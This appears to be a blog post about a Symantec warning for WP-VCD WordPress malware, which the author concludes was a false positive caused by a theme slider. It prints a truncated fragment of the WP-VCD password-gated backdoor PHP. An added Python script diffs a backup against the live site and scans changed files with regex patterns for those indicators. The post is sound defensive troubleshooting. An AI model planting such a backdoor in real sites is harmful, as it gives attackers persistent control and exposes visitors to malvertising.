Cybersecurity Memo

Thursday, April 9, 2020

Symantec Endpoint Protection Found Web Attack: Malicious Theme or Plugin Download 2 detected

Here is what I got when I visited my WordPress website, www.51sec.org. It looks very interesting and I am wondering what has been detected.


Based on the warning message and the SID, I was able to find the following details on the Symantec (Broadcom) website:


===========================================================================



Web Attack: Malicious Theme or Plugin Download 2

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description

This signature detects malicious activities associated with WP-VCD infection.

Additional Information

WP-VCD is a malware infection associated with WordPress websites. It spreads itself via nulled plugins and themes distributed by a network of related sites. This infection leads to black hat SEO activity (intended to manipulate search engine results on behalf of attackers) and insertion of malvertising code that creates potentially dangerous redirects and pop-up ads for users viewing a compromised site.

Affected

  • WordPress websites
===========================================================================

I kept digging into this WP-VCD infection, thinking my site was probably infected. Here is what I found about WP-VCD.

===========================================================================

The WP-VCD infection itself is spread via “nulled”, or pirated, plugins and themes distributed by a network of related sites, and it’s remarkable in the way it propagates once deployed. Behind the scenes, extensive command and control (C2) infrastructure and self-healing infections allow attackers to maintain a persistent foothold on these infected sites.

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474'))
    {
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))

The code snippet above was sourced from an infected functions.php file on a site compromised by WP-VCD. Due to the campaign’s prevalence, this example is likely immediately recognizable to anyone with experience handling WordPress malware infections.
===========================================================================
Before starting to compare the backup files with the current files to find out where this WP-VCD code was injected, I decided to try some other steps first.

Looking in Symantec Endpoint Protection, I could not see any details that would help.



The interesting thing is that this warning only shows on the homepage, not on the other pages of this website. That is the first thing I noticed. If a theme or plugin were infected, shouldn't all pages get this warning?

1. Online vulnerability scan, security checking
I could not find any online scanning tool that raised a similar warning.

2. Upgrade themes and plugins
All themes and plugins have been upgraded to the latest version.

3. Deactivate plugins
I checked all related plugins and deactivated them one by one to see if that helped, but found nothing.

4. Focus on the interesting things you found
Eventually I thought about what is different between the homepage and the other pages. The only section that shows on the first page is the Slider settings.

I decided to turn off the Slider settings on all pages as shown in the following screenshot, and then that annoying warning message was gone.

5. Installed the MalCare plugin to scan the whole site and found nothing on my site.
This is quite decent and useful software for site security; it copies some of the database tables and all site files to its cloud server to do the scanning. The WP-VCD signature is definitely in its database. If there were anything related to WP-VCD, MalCare would find it.

6. My last resort would be comparing files from backup.
That would take a while to figure out. I am glad I was able to find out that it is the slider causing this. It might relate to slider code from the Startup Blog Theme by Compete Themes.
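Step 6 (comparing the live site against a backup) and the quoted functions.php snippet both suggest a simple defender-side check: hash every file in the backup and in the live tree, list what was added or modified, and grep only those files for the indicator strings visible in the snippet (the wp_vcd marker variable, the change_domain action, and the hardcoded 32-hex password comparison). The script below is an added example, not Symantec's signature, Wordfence's code or the blog author's own tooling; the directory layout, theme name and file contents are constructed in a temporary directory for the demo, and the indicator list is a hypothetical starting point rather than a complete WP-VCD signature.

```python
"""Diff a WordPress backup against the live tree and scan changed files for
WP-VCD indicators. Added example (not the page's code); sample site is constructed."""
import hashlib
import os
import re
import tempfile

# Indicators taken from the quoted functions.php snippet. Hypothetical list:
# extend it with indicators from your own scanner or vendor signatures.
WPVCD_PATTERNS = [
    re.compile(r'\$div_code_name\s*=\s*["\']wp_vcd["\']'),
    re.compile(r'case\s+["\']change_domain["\']'),
    re.compile(r'\$_REQUEST\[["\']password["\']\]\s*==\s*["\'][0-9a-f]{32}["\']'),
]


def file_hashes(root):
    """Map each path relative to root (with '/' separators) to its SHA-256."""
    hashes = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                hashes[rel] = hashlib.sha256(fh.read()).hexdigest()
    return hashes


def compare_trees(backup_root, live_root):
    """Return sorted (added, removed, modified) relative paths, live vs backup."""
    backup, live = file_hashes(backup_root), file_hashes(live_root)
    added = sorted(set(live) - set(backup))
    removed = sorted(set(backup) - set(live))
    modified = sorted(p for p in backup.keys() & live.keys() if backup[p] != live[p])
    return added, removed, modified


def scan_for_wpvcd(root, rel_paths):
    """Return those rel_paths under root whose text matches any indicator."""
    hits = []
    for rel in rel_paths:
        with open(os.path.join(root, rel), "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        if any(p.search(text) for p in WPVCD_PATTERNS):
            hits.append(rel)
    return hits


def write(root, rel, text):
    """Create rel under root (and its directories) with the given text."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)


def build_demo_site(base):
    """Constructed sample: a clean backup, and a live tree with one injected
    functions.php plus one harmless new file. Theme name and paths are made up."""
    backup, live = os.path.join(base, "backup"), os.path.join(base, "live")
    theme = "wp-content/themes/demo-theme/"
    clean = "<?php\nfunction demo_setup() { add_theme_support('title-tag'); }\n"
    # Same shape as the quoted snippet, with the action body emptied out.
    injected = clean + (
        "if (isset($_REQUEST['action']) && isset($_REQUEST['password'])"
        " && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474')) {\n"
        "  $div_code_name=\"wp_vcd\";\n"
        "  switch ($_REQUEST['action']) { case 'change_domain'; break; }\n"
        "}\n"
    )
    for root in (backup, live):
        write(root, theme + "style.css", "/* Theme Name: Demo */\n")
    write(backup, theme + "functions.php", clean)
    write(live, theme + "functions.php", injected)
    write(live, theme + "extra.php", "<?php\n// new but clean helper file\n")
    return backup, live


def run_demo():
    """Build the sample site, diff it, and scan only what changed or appeared."""
    with tempfile.TemporaryDirectory() as base:
        backup, live = build_demo_site(base)
        added, removed, modified = compare_trees(backup, live)
        hits = scan_for_wpvcd(live, added + modified)
        return {"added": added, "removed": removed, "modified": modified, "hits": hits}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Scanning only the added and modified files keeps the noisy part (grepping every PHP file) small, and a file that is new but matches no indicator, like extra.php above, shows up in the diff for manual review without being flagged as malicious. On a real site, point compare_trees at the backup and the live wp-content directory and review every hit by hand before deleting anything.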

To sum up, based on my troubleshooting this morning, this is just a false positive from the Symantec Endpoint Protection software. Symantec's security business was bought by Broadcom a while ago, and the future of the Symantec products is not clear. I might need to think about changing to other security software.

Note. It has been reported to Symantec Review site - https://symsubmit.symantec.com/
